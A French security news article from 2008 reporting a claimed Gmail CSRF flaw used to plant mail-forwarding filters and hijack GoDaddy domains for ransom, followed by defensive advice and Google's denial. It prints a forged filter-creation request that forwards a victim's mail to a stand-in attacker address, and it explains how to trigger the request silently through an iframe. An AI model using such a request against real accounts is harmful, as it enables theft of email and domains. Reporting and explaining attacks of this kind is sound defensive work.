Une faille dans Gmail pour rediriger les mails des utilisateurs

Par Xavier Poli, secuobs.com
Le 24/11/2008

---

Résumé : Une faille aurait été identifiée dans le service de messagerie Gmail, elle permettrait à un attaquant de rediriger, via les filtres, les emails d'un utilisateur vers un compte de messagerie tiers. Certains noms de domaine auraient ainsi déjà été subtilisés via cette technique. - Lire l'article



Une vulnérabilité présente dans le service de messagerie Gmail ( lien ), offert gratuitement par la société Google, permettrait à une personne mal intentionnée de mettre en place des filtres malicieux afin de rediriger les emails d’un utilisateur vers une messagerie tierce. En outre, il ne serait pas nécessaire pour cet attaquant d’avoir préalablement accès aux informations de connexion, login et mot de passe, de la victime.

Cette faille aurait notamment déjà permis à des personnes malveillantes de rediriger des sites web vers des serveurs tiers via l’accès frauduleux à la gestion des noms de domaines associés à ces sites. Ces noms de domaine seraient en majeure partie enregistrés auprès de la société GoDaddy ( lien ) ; les noms de domaine makeuseof.com ( lien ) et yump3.org auraient ainsi connu cette mésaventure au même titre que sept cent quatre-vingt huit autres noms de domaine selon une première estimation.

Le domaine makeuseof.com, cité précédemment, est finalement « revenu » vers son propriétaire légitime au bout de trente-six heures de pérégrination ; ce retour a été opéré sans que le propriétaire n’ait eu à s’acquitter de la rançon de deux milles dollars demandée par l’attaquant. A titre d’information, le paiement devait s’effectuer à l’aide de Western Union ( lien ) vers Ankara, capitale de la Turquie.

Depuis la mise à disposition publique des détails de cette affaire par le site makeuseof.com, il est à noter que l’attaquant aurait également émis des menaces d’attaques par Déni de Service Distribué ( DDoS - lien ) si ces détails n’étaient pas retirés au plus vite.

Afin d’être opérationnelle, cette faille pourrait être exploitée à l’aide d’un code spécifique qui forcerait l’utilisateur à créer, via une instance de son navigateur Internet, un filtre de redirection au sein de son compte Gmail. Dans le cas du vol des domaines enregistrés auprès de la société GoDaddy, il aurait été nécessaire pour l’attaquant de récupérer dans un premier temps une liste des noms de domaine enregistrés via un compte Gmail ; cette récupération étant réalisée via un outil permettant d'effectuer automatiquement des requêtes de type Whois ( lien ).

Il lui aurait ensuite suffit d’envoyer un email malicieux, de type phishing, aux propriétaires afin de les forcer à visiter un lien permettant de configurer discrétement un filtre supprimant automatiquement tous les emails de source GoDaddy après en avoir transmis une copie sur son propre email. Il lui aurait alors resté à effectuer une demande de résiliation des mots de passe associés à ces noms de domaine auprès des services en ligne de GoDaddy afin de récupérer les mails redirigés qui allaient contenir les liens de confirmation pour modifications.

Techniquement, lorsque l’on créé un filtre dans un compte Gmail, la requête comporte un certain nombre de variables qui ne sont pas visibles directement dans l’URL pour des raisons de sécurité (GET Vs POST, XSS, CSRF, injection SQL, etc.) mais que l’on peut visualiser à l’aide des entêtes HTTP via différentes extensions, pour Mozilla Firefox par exemple ( lien ). Ainsi dans le cas de Gmail, une requête de création de filtre se présenterait sous la forme :

http://mail.google.com/mail/
?ui=2
&ik=ad7df7dc23
&at=xn3j35svndkg48yp2qgmpt99ivcqdc
&view=up
&act=cf
&rt=h
&zx=pjo6fg-k2ljzh
&search=cf
&cf1_from=support%40godaddy.com
&cf2_emc=true
&cf2_email=attaquant%40attaquant.com
&cf2_tr=true


On constate ici que la variable « act » définit une action de création de filtre alors que la valeur affectée à la variable « ik » représente elle un identifiant unique pour chaque compte utilisateur de Gmail ; cette valeur « ik » peut être obtenue via la récupération des informations contenues dans le cookie « GMAIL_AT » à l’aide d’une page malicieusement forgée à cet égard.

La valeur de la variable « at » est quant à elle relative à la clé de session alors que les variables « cf1_from » et « cf2_email » contiennent respectivement l’adresse email de la source et l’email de l’attaquant vers lequel les emails à destination de la victime seront redirigés après la création de ce filtre. Cette requête malicieuse pourrait être intégrée à une page web via l’utilisation d’une iframe ( lien ) afin de forcer l’utilisateur à l’exécuter de manière discrète.

Du point de vue des protections actuelles, il est nécessaire de vérifier régulièrement que le compte ne contient pas de filtres actifs autres que ceux qui ont été configurés légitimement ; par ailleurs, il est plus qu’envisageable d’utiliser des solutions qui permettent de bloquer l’utilisation des iframes sur les sites visités. Il est également recommandé d’éviter d’offrir la possibilité à un attaquant d’afficher les informations personnelles qui concernent un nom de domaine lorsqu'il effectue une recherche de type Whois sur celui-ci.

Dans le doute, il serait préférable de ne pas utiliser de compte Gmail (ou autre compte webmail) pour la gestion de services sensibles comme l’enregistrement de noms de domaine. Lors des navigations sur des sites tiers qui ne soient pas de confiance, il est judicieux de ne plus rester connecté simultanément sur un compte Gmail et plus généralement sur l’ensemble des services de Google.

Il est tout aussi recommandable de ne pas ouvrir de liens contenus dans des emails reçus sur une messagerie Gmail (ou autres) si l’expéditeur de ces emails ne peut pas être évalué comme étant de confiance.

Update : Suite à la publication de cette information, Google a publié une réponse ( lien ) comme quoi il n'y a pas de preuve de la présence d'une vulnérabilité de ce type dans Gmail et que c'est le fait uniquement d'une attaque par phishing classique. Cependant un seul des propriétaires des sites concernés aurait été contacté lors des investigations ; ce qui semble un peu juste pour en tirer une quelconque conclusion d'autant plus que cela ne semble pas être le propriétaire du domaine makeofuse.com ( lien ).

Source : Rootsecure.net ( lien )